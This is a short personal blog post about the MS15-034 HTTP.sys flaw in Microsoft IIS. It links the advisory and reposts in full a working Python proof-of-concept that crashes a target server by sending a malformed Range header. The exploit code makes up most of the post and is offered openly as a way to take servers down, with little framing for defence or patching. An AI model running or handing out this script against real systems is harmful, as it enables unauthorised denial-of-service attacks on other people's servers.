HTTP.sys issue. DOS for now, exploit probably soon if not already.

home | blog | Terrible people and places | Covid-19 links | Teh Internet | guest blog |rants | placeholder | political | projects | Gwen and Liam | Citadel patched | Tools | Scouts




It looks like Microsoft Server 2008 32-bit running IIS is the odd man out.
I don't think that means it is not vulnerable however.

https://technet.microsoft.com/en-us/library/security/ms15-034.aspx

Here is some code to crash it:
http://www.exploit-db.com/exploits/36776/
And in case that goes away, here it is:
#Tested on Win Srv 2012R2.
import socket,sys
  
if len(sys.argv)<=1: 
 sys.exit('Give me an IP')
 
Host = sys.argv[1]
 
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
 
#Make sure iisstart.htm exist.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
 
SendPayload(Init, Host)
SendPayload(Payload, Host)



[æ]